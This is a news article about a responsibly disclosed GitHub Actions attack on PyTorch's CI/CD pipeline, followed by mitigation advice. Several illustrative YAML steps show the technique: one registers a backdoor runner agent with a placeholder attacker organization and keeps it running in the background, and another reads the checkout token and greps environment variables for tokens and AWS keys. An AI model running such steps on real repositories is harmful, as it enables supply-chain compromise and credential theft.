Researchers demo new CI/CD attack techniques in PyTorch supply chain

A pair of security researchers managed to infiltrate the development infrastructure of PyTorch using new techniques that exploit insecure configurations in GitHub Actions workflows. Their proof-of-concept attack was responsibly disclosed to Meta AI, PyTorch’s lead developer, but other software development organizations that use GitHub Actions have likely made the same deployment mistakes, potentially exposing themselves to software supply-chain attacks.

“Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies – the list goes on,” security researcher John Stawinski said in a detailed write-up about the attack on his personal blog. “In short, it was bad. Quite bad.”

Stawinski devised the attack together with colleague Adnan Khan. They both work as security engineers for cybersecurity firm Praetorian and last summer began investigating and developing a new class of exploits for continuous integration and continuous delivery (CI/CD) platforms. One of their first targets was GitHub Actions, a CI/CD service that allows GitHub users to automate the building and testing of software code by defining workflows that execute automatically inside containers on either GitHub’s or the user’s own infrastructure.

Khan initially found a critical vulnerability that could have led to the poisoning of GitHub Actions’ official runner images. The “runners” are the virtual machines (VMs) that execute build actions defined inside GitHub Actions workflows. After reporting the vulnerability to GitHub and receiving a $20,000 bug bounty for it, Khan realized that the core issue he found was systemic and that thousands of other repositories were likely impacted.

Since then, Khan and Stawinski have found vulnerabilities in the software repositories and development infrastructure of major corporations and software projects and have collected hundreds of thousands of dollars in rewards through bug bounty programs. Their “victims” included Microsoft’s DeepSpeed, a Cloudflare application, the TensorFlow machine-learning library, the crypto wallets and nodes of several blockchains, and PyTorch, one of the most widely used open-source machine-learning frameworks.

PyTorch was originally developed by Meta AI, a subsidiary of Meta (formerly Facebook), but its development is now governed by the PyTorch Foundation, an independent organization that operates under the Linux Foundation’s umbrella.

“We began by discovering every nuance of GitHub Actions exploitation, executing tools, tactics, and procedures (TTPs) that had never been seen before in the wild,” Stawinski said in a blog post earlier this month. “As our research advanced, we evolved our TTPs to attack multiple CI/CD platforms, including GitHub Actions, Buildkite, Jenkins, and CircleCI.”

Running self-hosted GitHub Actions runners is risky

GitHub offers different types of preconfigured “runners” (Windows, Linux, and macOS) that run directly on GitHub’s infrastructure and can be used to test and build applications for those operating systems. However, users also have the option of deploying the GitHub Actions build agent on their own infrastructure and linking it to their GitHub organization and repositories. These are known as self-hosted runners, and they offer several benefits, such as support for operating system versions, hardware combinations, and additional software tools that GitHub’s hosted runners don’t provide.

Given this flexibility, it’s not surprising that many projects and organizations choose to deploy self-hosted runners. This was also the case for PyTorch, which makes extensive use of both GitHub-hosted and self-hosted build agents. The organization has more than 70 different GitHub workflow files in its repositories and typically runs over ten workflows per hour.

Actions workflows are defined in .yml files that specify, in YAML syntax, which commands to execute and on which runner. These workflows are triggered automatically by events such as pull_request, which fires when someone proposes a code change to a repository branch. This is useful because the workflow can run, for example, a series of tests on the proposed code before a human reviewer even looks at it and decides whether to merge it.
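What such a file looks like in practice can be sketched in a few lines; the file name, job, and test command below are illustrative, not taken from PyTorch’s actual configuration:

```yaml
# .github/workflows/ci-tests.yml -- illustrative sketch, not an actual PyTorch workflow
name: CI tests

on:
  pull_request:         # runs automatically when a pull request is opened or updated

jobs:
  unit-tests:
    # "self-hosted" routes the job onto a runner registered by the repository owner
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4   # check out the proposed code change
      - name: Run the test suite
        run: make test              # placeholder build/test command
```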

“It doesn’t help that some of GitHub’s default settings are less than secure,” Stawinski said. “By default, when a self-hosted runner is attached to a repository, any of that repository’s workflows can use that runner. This setting also applies to workflows from fork pull requests [PRs]. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR.”

A fork pull request means that someone created a personal copy (a fork) of the repository, worked on it, and is now trying to merge their changes back. This is standard practice: contributors often work in their own forks before submitting changes back to the main repository for approval.

From GitHub’s perspective, a “contributor” is anyone who has had a pull request merged into the default branch. The default setting for workflow execution is to run workflows automatically on fork pull requests from past contributors, which means that if someone ever had a fork PR merged, workflows will execute automatically for all their future fork PRs. This setting can be changed to require approval before running workflows on all fork PRs, whether the owner is a past contributor or not.

“Viewing the pull request history, we found several PRs from previous contributors that triggered pull_request workflows without requiring approval,” the researchers said. “This indicated that the repository did not require workflow approval for fork PRs from previous contributors. Bingo.”

So an attacker would first need to become a contributor by submitting a legitimate fork PR that gets merged. They could then abuse their newly gained privilege: create a fork, write a malicious workflow file inside it, and open a pull request. This would automatically execute their malicious workflow on the organization’s self-hosted GitHub Actions runner.

This sounds like a lot of work, but it’s not. You don’t need to add new features to a project to become a contributor. The researchers gained contributor status on PyTorch by finding a typo in a documentation file and submitting a PR to fix it. Once their minor documentation fix was accepted, they had the ability to execute malicious workflows.
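To illustrate why that access matters, the sketch below shows the kind of workflow an attacker could add in their fork. The file name and commands are hypothetical and deliberately harmless, but any shell commands placed in the run step would execute on the organization’s self-hosted runner as soon as the fork PR triggers the workflow:

```yaml
# .github/workflows/lint.yml -- hypothetical attacker-supplied workflow added in a fork
name: Lint

on:
  pull_request:           # fires when the attacker opens a pull request from the fork

jobs:
  lint:
    runs-on: self-hosted  # lands on the victim organization's self-hosted runner
    steps:
      - name: Prove code execution
        # A real attacker would fetch and run a payload here; this placeholder
        # merely demonstrates that arbitrary commands execute on the runner.
        run: |
          whoami
          hostname
```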

Using the GitHub Actions runner as a trojan

Another default behavior of self-hosted GitHub Actions runners is that they are non-ephemeral. They aren’t reset and wiped once a workflow completes. “This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the path, etc.) will persist past the current workflow,” the researchers said. “It also means that future workflows will run on that same runner.”

This makes it a good target for deploying something like a trojan that connects back to the attackers and then collects all possible sensitive information exposed by future workflow executions. But what to use as a trojan that wouldn’t be detected by antivirus products or whose communications wouldn’t get blocked? The GitHub Actions runner agent itself, or rather another instance of it that’s not linked to the PyTorch organization but to a GitHub organization controlled by the attackers.

“Our ‘Runner on Runner’ (RoR) technique uses the same servers for C2 as the existing runner, and the only binary we drop is the official GitHub runner agent binary, which is already running on the system. See ya, EDR and firewall protections,” Stawinski said.
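A rough sketch of how such a step could look inside the attacker’s fork-PR workflow is shown below. The organization URL, registration token, runner name, and agent version are placeholders, and this is an illustration of the general idea rather than the researchers’ actual tooling:

```yaml
      # Hypothetical step added to the attacker's fork-PR workflow (see earlier sketch);
      # the organization URL, registration token, runner name, and version are placeholders.
      - name: Persist a second runner agent ("Runner on Runner")
        run: |
          mkdir -p /tmp/.cache && cd /tmp/.cache
          # Fetch the official GitHub Actions runner agent -- the only binary dropped
          curl -sSL -o runner.tar.gz \
            https://github.com/actions/runner/releases/download/v2.311.0/actions-runner-linux-x64-2.311.0.tar.gz
          tar xzf runner.tar.gz
          # Register the agent against a GitHub organization the attacker controls
          ./config.sh --url https://github.com/attacker-org \
                      --token ATTACKER_REGISTRATION_TOKEN --unattended --name build-cache
          # Start it in the background so it survives the current job
          nohup ./run.sh >/dev/null 2>&1 &
```

Because the runner is non-ephemeral, the backgrounded agent keeps polling the attacker’s organization for jobs long after the original workflow finishes.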

Extracting sensitive access tokens

Up to this point, the attackers have managed to get a very stealthy trojan running on a machine that’s part of the organization’s development infrastructure and is used to execute sensitive jobs in its CI/CD pipeline. The next step is post-exploitation: trying to exfiltrate sensitive data and pivot to other parts of the infrastructure.

Workflows often include access tokens for GitHub itself or for third-party services. These tokens are required for the jobs defined in the workflow to execute correctly. For example, the build agent needs read privileges to check out the repository and might also need write access to publish the resulting binary as a new release or to modify existing releases.
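As a rough illustration of how these privileges appear in a workflow, the sketch below declares the token scope a release-style job might request; the workflow, trigger, and upload command are hypothetical, not PyTorch’s actual release configuration:

```yaml
# Illustrative release-style workflow showing token scopes (not PyTorch's actual configuration)
name: Publish release
on:
  workflow_dispatch:        # triggered manually here; real release workflows may use tags or schedules

permissions:
  contents: write           # the job's GITHUB_TOKEN needs write access to create or modify releases

jobs:
  publish:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4       # needs at least read access to the repository
      - name: Upload the build artifact
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: gh release upload v1.0.0 dist/example.whl   # placeholder upload command
```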

These tokens are stored in various locations on the runner’s filesystem, such as the .git configuration file, or in environment variables, and can obviously be read by the stealthy “trojan” that runs with root privileges. Some, such as GITHUB_TOKEN, are ephemeral and only valid during the execution of the workflow, but the researchers found ways to extend their life. Even if they hadn’t found these methods, new workflows with newly generated tokens execute all the time on a busy repository like PyTorch, so there are plenty of new ones to collect.
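One concrete example, assuming the default behavior of the actions/checkout action (persist-credentials): the job’s token ends up in the local Git configuration of the checked-out repository. The sketch below is written as a workflow step for consistency with the earlier examples; in the attack scenario, a resident background process would read the same locations:

```yaml
      # Written as a workflow step for consistency with the earlier sketches; in the
      # attack, a resident background process would read the same locations.
      - name: Where credentials end up on the runner (illustrative)
        run: |
          # actions/checkout, with its default persist-credentials behavior, stores the
          # job's token (base64-encoded) in the local Git configuration:
          git config --get http.https://github.com/.extraheader
          # Secrets passed to steps also surface as environment variables of the
          # runner's worker processes:
          printenv | grep -iE 'token|aws' || true
```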

“The PyTorch repository used GitHub secrets to allow the runners to access sensitive systems during the automated release process,” Stawinski said. “The repository used a lot of secrets, including several sets of AWS keys and GitHub Personal Access Tokens (PATs).”

PATs are often overprivileged and are an attractive target for attackers, but in this case they were used in other workflows that were not executing on the compromised self-hosted runner. However, the researchers found ways to use the ephemeral GitHub tokens they collected to place malicious code into workflows that executed on other runners and had access to those PATs.

“It turns out that you can’t use a GITHUB_TOKEN to modify workflow files,” Stawinski said. “However, we discovered several creative…’workarounds’…that will let you add malicious code to a workflow using a GITHUB_TOKEN. In this scenario, weekly.yml used another workflow, which used a script outside the .github/workflows directory. We could add our code to this script in our branch. Then, we could trigger that workflow on our branch, which would execute our malicious code. If this sounds confusing, don’t worry; it also confuses most bug bounty programs.”

In other words, even if an attacker can’t modify a workflow directly, they might be able to modify an external script that is called by that workflow and get their malicious code in that way. Repositories and CI/CD workflows can get quite complex with many interdependencies, so such small oversights are not uncommon.
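A simplified illustration of the pattern, using hypothetical file names: the workflow file itself cannot be modified with a GITHUB_TOKEN, but the script it delegates to lives outside .github/workflows and can be changed on a branch pushed with that token:

```yaml
# Simplified illustration with hypothetical names: the workflow file itself cannot be
# modified with a GITHUB_TOKEN...
name: Weekly maintenance
on:
  workflow_dispatch:        # hypothetical trigger that lets the workflow run on a chosen branch

jobs:
  maintenance:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4
      # ...but scripts/weekly_maintenance.sh lives outside .github/workflows/, so a
      # branch pushed with that token can change it, and whatever it contains runs
      # here with access to the job's secrets.
      - run: bash scripts/weekly_maintenance.sh
```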

Even without the PATs, a GITHUB_TOKEN with write privileges alone would have been enough to poison PyTorch’s releases on GitHub, and separately extracted AWS keys could have been used to backdoor PyTorch releases hosted on the organization’s AWS account. “There were other sets of AWS keys, GitHub PATs, and various credentials we could have stolen, but we believed we had a clear demonstration of impact at this point,” the researchers said. “Given the critical nature of the vulnerability, we wanted to submit the report as soon as possible before one of PyTorch’s 3,500 contributors decided to make a deal with a foreign adversary.”

Mitigating risk from CI/CD workflows

There are many lessons for software development organizations in this attack: the risks of running self-hosted GitHub Actions runners in default configurations, the risks of workflows that execute scripts located outside the workflows directory, the risks of overprivileged access tokens, and the danger of legitimate applications being repurposed as trojans. Other researchers have done this before with Amazon’s AWS Systems Manager agent and with Google’s SSO and device management solution for Windows.

“Securing and protecting the runners is the responsibility of end users, not GitHub, which is why GitHub recommends against using self-hosted runners on public repositories,” Stawinski said. “Apparently, not everyone listens to GitHub, including GitHub.”

However, if self-hosted runners are necessary, organizations should at the very least consider changing the default setting of “Require approval for first-time contributors” to “Require approval for all outside collaborators.” It’s also a good idea to make self-hosted runners ephemeral and to execute workflows from fork PRs only on GitHub-hosted runners.
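One common way to implement the last point is to choose the runner based on whether the pull request comes from a fork; the sketch below uses a standard GitHub Actions expression for this, with an illustrative job and test command:

```yaml
# Illustrative hardening sketch: route fork PRs to GitHub-hosted runners only
name: Tests
on:
  pull_request:

jobs:
  tests:
    # Use the self-hosted runner only for branches in the same repository;
    # pull requests coming from forks fall back to a GitHub-hosted runner.
    runs-on: ${{ github.event.pull_request.head.repo.full_name == github.repository && 'self-hosted' || 'ubuntu-latest' }}
    steps:
      - uses: actions/checkout@v4
      - run: make test      # placeholder test command
```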

This is not the first time that insecure use of GitHub Actions features has created software supply-chain security risks. Other CI/CD services and platforms have also had their own vulnerabilities and insecure default configurations. “The issues surrounding these attack paths are not unique to PyTorch,” the researchers said. “They’re not unique to ML repositories or even to GitHub. We’ve repeatedly demonstrated supply chain weaknesses by exploiting CI/CD vulnerabilities in the world’s most advanced technological organizations across several CI/CD platforms, and those are only a small subset of the greater attack surface.”
